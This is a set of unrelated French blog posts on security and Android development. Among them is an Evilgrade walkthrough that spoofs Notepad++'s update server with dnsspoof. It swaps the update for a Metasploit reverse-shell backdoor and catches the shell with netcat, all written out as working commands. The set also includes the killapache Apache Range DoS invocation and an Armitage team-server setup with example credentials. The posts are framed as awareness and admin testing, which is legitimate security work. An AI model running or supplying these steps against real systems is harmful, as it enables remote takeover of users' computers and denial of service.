Et bien Armitage l’a réalisé.

Armitage, qu’est ce ?
Bon, voici une petite séance de rattrapage, Armitage est un projet qui a vu le jour de mémoire en 2010.
Il a pour but, d’apporter une interface graphique au framework Metasploit, afin de faciliter l’audit(pentest) de plateforme.
Pour ceux qui travaille avec Metasploit, et qui ne sont pas « fan » du travail au sein d’une console, armitage est une vraie plus value.

Ce produit est très interessant et performant.
Il permet d’avoir meilleure gestion de la plateforme cible, et cela à travers une vision globale de l’avancement des exploits(prise de controle à distance).

Dans cet article, nous n’aborderons pas l’installation ni la prise en main de ce produit qui fait désormais partie intégrante du Framework Metasploit.

Nous détaillerons plutot les étapes à effectuer pour préparer l’audit de plateforme à travers plusieurs clients armitage.

Pour ce faire, les instances (client) armitage se connecteront sur un serveur metasploit central qui servira de relay pour executer les scans, les exploits, pour ensuite collecter les résultats.

Une fois ceux-ci obtenus, ils seront accessibles de tous les clients armitage connectés au serveur Metasploit RPC, pour progresser davantage dans l’audit.

source : http://www.fastandeasyhacking.com/manual#multi

1/ Mise en place du serveur Metasploit RPC, et du serveur armitage central.

Pour cet exemple, le serveur aura pour nom « srv-armitage » et adresse IP « 192.168.0.4″.

# msfrpcd -f -U msf -P password -t basic
with    -f specify to run daemon
        -U user_instance
        -P password_instance
        -t

# armitage --server 192.168.0.4 55553 msf password
with    192.168.0.4 @ip_metasploit_instance
        55553 : port of metasploit_instance
        msf : user of metasploit_instance
        password : password of metasploit_instance

Une fois ces commandes effectuées, sans erreur [...], le serveur est donc opérationnel et prêt à accueillir des connexions de clients armitage.
Vous pouvez vérifier le bon fonctionnement du serveur avec la commande « netstat » et « ps ».

# netstat -ntpl

–> vérification de l’écoute du système sur le port 55553 et le socket ip 0.0.0.0

# ps -aux | grep msfrpcd
# ps -aux | grep armitage

–> vérification de l’exécution des processus lancés précédemment.

2/ Connexion des clients armitage

La deuxième étape consiste en l’établissement des connexions de clients armitage.
Cette partie peut être réalisée sur n’importe quel ordinateur du réseau.

# armitage

–> Lancement du produit armitage à travers la commande « # armitage ».
A l’affichage de la popup de connexion, vous n’avez plus qu’à saisir les informations définies précédemment lors de l’initialisation du serveur « Metasploit RPC ».

@IP : 192.168.0.4
user : msf
pass : password

Vous pouvez désormais distribuer le travail à effectuer à vos petits jeunes, pendant que vous regarderez le bon déroulement des opérations sur votre instance .

You can find in this ebook, some guideline to increase security on your iphone or ipad.
The Australian government explains in few chapters risk, and how harden IOS security.

- Protect data with encryption on IOS
- Suggested policies
- Recommanded settings (passcode length, immediate device lock, allow installing app, etc … )
- risk incurred

To conclude, this hardening guide is very comprehensive and describes risks in the field of information and the basic reflexes to acquire.

Happy reading

<< iOS5_Hardening_Guide >>

Ayant profité de la sortie de BattleField3, je me suis lancé avant d’avoir le jeu dans l’optique de créer un Widget permettant de garder un oeil sur l’évolution des stats de notre escouade.

Après quelques semaines de développement, je vous livre un premier jet de l’application.

1/ Description

Donc voici le principe, il s’agit d’un widget dédié à afficher les statistiques des joueurs sous BattleField3. Vous pouvez en stockez autant que vous le souhaitez sur votre desktop, il n’y aucune restriction.

2/ Fonctionnement

Une fois le widget ajouté, vous cliquez dessus et vous obtenez une popup ou vous devez saisir le pseudo du joueur dont vous souhaitez obtenir les stats. Puis sur l’image disquette pour sauvegarder. A l’issue, la première synchro va s’effectuer.

si vous souhaitez forcer une mise à jour de stats, vous pouvez le faire à travers le bouton du milieu avec les flèches en arc de cercle.

Site de référence : battlelog, du coup, aucun besoin de s’authentifier en amont.
La fréquence de mise à jour est de 1 par heure. ( à optimiser au mieux dans une version finale )
Système de Cache : J’ai mis en place un système de cache pour les images des grades, donc ne vous étonnez pas si dans les permissions, il y a apparaît la nécessité d’accéder à la sd card. Toutes les images des « rank » seront stockés au fur et à mesure du besoin dans un répertoire, cela permet d’éviter l’utilisation de la bande passante pour télécharger 2 fois la même image, car 2 joueurs sont au même rank.

N’ayez pas peur, si la première synchro est lente c’est normale, il y a une phase de récupération de Battlelog ID en fonction du pseudo.
Un conseil essayer de faire le premier ajout des widgets dans un endroit ou vous captez le signal 3g/wifi pour vous éviter toute attente.

3/ Conclusion

Si ce widget vous intéresse, faites vous plaisir, et n’hésitez pas à me faire remonter vos critiques.

Vous pouvez la télécharger sur le market à l’URL suivante :
BF3STATS_WIDGET

source : http://www.vogella.de/blog/
Il s’agit d’un très bon blog orienté développement d’application java, d’où android.
 
 

Code source de la fonction

public static boolean isNetworkAvailable() {
  ConnectivityManager cm = (ConnectivityManager) application_context.getSystemService(Context.CONNECTIVITY_SERVICE);
  NetworkInfo networkInfo = cm.getActiveNetworkInfo();
  // if no network is available networkInfo will be null, otherwise check if we are connected
  if (networkInfo != null && networkInfo.isConnected()) {
    return true;
  }
  return false;
}

N’oubliez pas de rajouter la demande de permissions au fichier « AndroidManifest.xml », comme ci-dessous.

    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"></uses-permission>

Vous y trouverez de nombreuses astuces auxquelles nous ne ferions pas attention habituellement, mais qui pourraient nous protéger de personnes malintentionnées.

Prenez quelques minutes pour les lire, je vous assure que ce fichier est très intéressant.
Même s’il aborde plus particulièrement l’iphone, ces bonnes pratiques peuvent très bien s’adapter au système Android (notamment pour l’utilisation de son smartphone sur des hotspots gratuits qui sont la cible la plus facile pour pouvoir intercepter vos données).

Bonne lecture en anglais ( pour l’instant, je vais essayer de prendre un peu de temps pour le traduire ).

Voici la liste des astuces :

Astuce 1: Activer le contrôle par code secret pour déverrouiller votre téléphone.

Astuce 2: Désactiver fonctionnalités qui pourraient être accédées sans entrer le code ( avec notamment la désactivation de l’affichage des SMS lors de leur réception ).

Astuce 3: Pallier les problèmes de sécurité intégré au sein de l’IOS ( par exemple le cache du clavier )

Astuce 4: Supprimer toutes les données avant de mettre son téléphone en réparation, revente

Astuce 5: Mettre à jour régulièrement sont ISO

Astuce 6: Jailbreak or Not, that is the question ?

Astuce 7: Activer les paramètres de sécurité sur le navigateur Safari

Astuce 8: Utiliser de manière sécurisée le Bluetooth, le Wi-Fi, et la messagerie EMAIL

Astuce 9: Activer les « Restrictions »

Astuce 10: Et enfin, activer l’application « Find My iPhone »

Je vous invite à télécharger le fichier pour y trouver toutes les indications (captures d’écran) afin de les appliquer.

Vous le trouverez à cet URL.

Présentation

Voici une extension qui prend de plus en plus d’ampleur au sein des internautes ces dernières semaines « ghostery ».
Elle a pour particularité de bloquer les différentes créations de cookies initiées à votre insu sur tous les sites commerciaux/blog/reseaux sociaux, sur lesquels vous naviguez.

Utilité

Quel est l’interet me direz vous ?
Tous ces sites ont depuis peu implémenté le fameux « like » de Facebook, ou « +1″ de Google. Ces images ne sont pas anodines et permettent de vous identifier de manière unique à travers un cookie tout au long de votre navigation sur internet.

Ces données vont ensuite être traitées par les services de publicité. C’est ce que l’on appelle de la publicité « Ciblée » !!!

Ou la trouver ?

L’extension « Ghostery » est présente sur la plupart des navigateurs tels que Firefox, Chrome, Opéra et même Safari.

Allez vite la télécharger.

Le 24 aout dernier a été publiée une vulnérabilité sur le service APACHE WEB. Celle-ci concerne toutes les versions d’apache 1.3 et 2, autant dire toutes

Description de la vulnérabilité

Pour la petite explication, la vulnérabilité se situe au niveau des entêtes HTTP sur le champ RANGE. Ce champ est utilisé lors de téléchargement de fichier sur un serveur HTTP pour segmenter celui-ci en de multiples parties de petite taille. Avec cette vulnérabilité, le champ est formatté avec un nombre incalculable d’interval (RANGE) de grande taille, ce qui provoque un DOS (Deny Of Service), et le serveur cible devient inaccessible durant l’attaque.

Test de la vulnérabilité

Pour les administrateurs Système et Sécurité, vous pourrez tester vos plateformes avec l’outil suivant : killapache.
Il s’agit d’un script perl qui va formatter une requête HTTP de manière à identifier un serveur vulnérable.
Le script nécessitera l’installation d’une dépendance pour l’exécution du script en de multiple thread.

# apt-get install libparallel-forkmanager-perl
# ./killapache_pl.bin $hostname $nb_fork

Solutions palliatives

Quelques solutions ont été trouvées pour pallier ce problème en attendant les mises à jour.

- 1ère Action : limiter la longueur des entêtes, en ajoutant la ligne ci-dessous dans le vhost du site.

LimitRequestFieldSize 200

- 2nde Action : Créer une RewriteRule qui limitera le nombre de ‘RANGE’ dans les entêtes.

RewriteEngine on
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
RewriteRule .* – [F]

- Dernière Action qui prendra du temps, mais permettra d’obtenir des résultats en terme de sécurité inégalables : l’installation du module MODSECURITY.

En ce jour, je vais vous faire part de mon expérience concernant un logiciel usurpant l’identité des différents éditeurs de logiciels afin d’informer ceux-ci d’une nouvelle mise à jour disponible. Dès lors que le logiciel lance sa mise à jour, une backdoor est envoyée en lieu et place de l’update, une connexion sur le pc cible est alors créée pour le plus grand bonheur d’une personne malveillante.

Le but de cet article est de sensibiliser les administrateurs système et sécurité des entreprises aux différentes possibilité offertes à une personne malveillante au sein de votre réseau. !!

Introduction

Le produit qui offre toutes ces possibilités est Evilgrade édité par : Infobytesec.
Cet outil est un framework se présentant de la même manière que metasploit sous forme de console, et offrant une multitude de module en fonction du logiciel cible souhaité.
Les modules présents sont :
- opera
- itunes
- quicktime
- winamp
- notepad ++
- etc …

Aujourd’hui nous allons nous intéresser à Notepad++.

Pré-requis

Afin de prévenir quelques erreurs lors de la compilation de Evilgrade, vérifions que le module perl dump est présent au sein du système.

root@bt:# cpan Data::Dump

Une fois le module dump installé, nous allons récupérer les sources du framework Evilgrade sur le site de son éditeur.

root@bt:# tar xvzf isr-evilgrade-2.0.0.tar.gz
root@bt:# cd isr-evilgrade/

et voilà l’installation est terminée.

Pour les pré-requis, il ne manque plus que le paquet dnsspoof présent au sein de dsniff.

root@bt:# apt-get install dsniff

Evilgrade en action

Nous allons maintenant pouvoir tester evilgrade, pour ce faire « mettons nous en situation ».

root@bt:~/Desktop/isr-evilgrade# ./evilgrade
            _ _                     _
           (_) |                   | |
  _____   ___| | __ _ _ __ __ _  __| | ___
 / _ \ \ / / | |/ _` | '__/ _` |/ _` |/ _ \
|  __/\ V /| | | (_| | | | (_| | (_| |  __/
 \___| \_/ |_|_|\__, |_|  \__,_|\__,_|\___|
                __/ |
                |___/
-------------------------------------------
---------------------  www.infobytesec.com
- 63 modules available.
evilgrade>

Une fois lancé, nous allons charger le module notepad++ afin de le configurer.

evilgrade> conf notepadplus

Vous pouvez d’ailleurs consulter toutes les options offertes par ce module.

evilgrade(notepadplus)>show options
Display options:
===============
Name = notepadplus
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
Description = "The notepad++ use GUP generic update process so it''s boggy too."
VirtualHost = "notepad-plus.sourceforge.net"
.----------------------------------------------.
| Name   | Default           | Description     |
+--------+-------------------+-----------------+
| enable |                 1 | Status          |
| agent  | ./agent/agent.exe | Agent to inject |
'--------+-------------------+-----------------'

Nous allons modifier l’agent afin que celui-ci pointe sur une backdoor générée par metasploit.

evilgrade(notepadplus)> set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp
                        LHOST=10.0.0.1 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]'

A vous de modifier les variables avec vos propres valeurs.
Une fois tout ceci effectué, il ne nous reste plus qu’à lancer le serveur web et dns.

evilgrade(notepadplus)> start

Maintenant que le backdoor est en place avec un reverse tcp sur le port 1234, nous devons lancer netcat en écoute pour pouvoir ensuite intéragir sur la session du poste cible.

root@bt:# nc -l -v -p 1234

Adaptation face à un refus du serveur DNS de se lancer

Ayant rencontré quelques problèmes avec le serveur DNS intégrer à evilgrade, je me suis retourné sur dnsspoof.
A travers une autre console, nous allons donc utiliser cet utilitaire pour usurper l’identité du serveur notepad-plus.sourceforge.net.

root@bt:# vi hosts
-
10.0.0.1        notepad-plus.sourceforge.net
root@bt:# dnsspoof -i eth0 -f hosts

Vue par le poste cible

Du côté du poste de la victime, si la mise à jour automatique est activée, notepad++ va rechercher lors de son lancement la présence d’une mise à jour sur le site de l’éditeur.
Avec DnsSpoof, désormais le site de l’éditeur est le serveur evilgrade.
Evilgrade va alors informer le pc cible qu’une mise à jour est disponible prête à être téléchargée. Notepad++ va ainsi télécharger la backdoor fournit et l’exécuter…sniff…c’est la fin..

En effet, lors de l’exécution de la backdoor, le pc cible va ouvrir une connexion sur le serveur evilgrade sur le port 1234. Vous devriez obtenir à ce moment là un beau terminal en lieu et place de votre netcat avec C:\Program Files\…

Conclusion

Pour conclure méfiez vous des mises à jours automatiques surtout sur un réseau local (non connecté à l’Internet).

Installation des pré-requis

Nous allons débuter par l’installation des pré-requis, OpenJDK qui implémentera la machine virtuelle java, et eclipse l’interface de développement/débogage.

# apt-get install openjdk-6-jdk eclipse ant

- Lorsque l’installation s’est terminée correctement, nous allons configurer eclipse pour attaquer les dépôts de Google. Pour ce faire, il suffit de le lancer et de sélectionner : “Help” / “Install new software” / “Add” button » et insérer les données suivantes :
* name: android
* url: http://dl-ssl.google.com/android/eclipse
et valider.
- Une fois que « Eclipse » aura parcouru les sources Google, sélectionnez ce que vous souhaitez installer.

Téléchargement et Installation du kit de développement SDK d’Android

Dans un premier temps, nous allons téléchargé le SDK à l’URL suivante : http://developer.android.com/sdk/index.html
* Sélectionner Linux(i386) version : actuellement la version est la r12
* Une fois téléchargée, il suffit d’extraire l’archive et de lancer Eclipse. Rendez-vous dans les préférences « Window / Preferences / Android », et sélectionnez le répertoire du SDK.
* Ensuite, il ne reste plus qu’à installer les librairies correspondant à la version d’android que l’on souhaite utiliser pour nos applis « Window / Android SDK and AVD MANAGER / Available packages », selectionnez SDK Plateform 2.2 & 2.3 les plus utilisés actuellement.

	-- Install selected
	-- Accept All
	-- Restart ADB

Création de l’émulateur

Pour pouvoir tester vos applications tout au long de la phase de développement, rien de tel qu’un émulateur de téléphone. Voici la procédure pour la création à partir de l’interface d’eclipse :

 "Window / Android SDK and AVD MANAGER / Virtual Devices / New"
	-- Choose name
	-- choose Target : Android 2.3 or 2.2
	-- SD Card : Size Storage when apps go install
	-- you can also add hardware recommandation for example "Max VM application Heap", that limit the memory use by your apps.

Enjoy…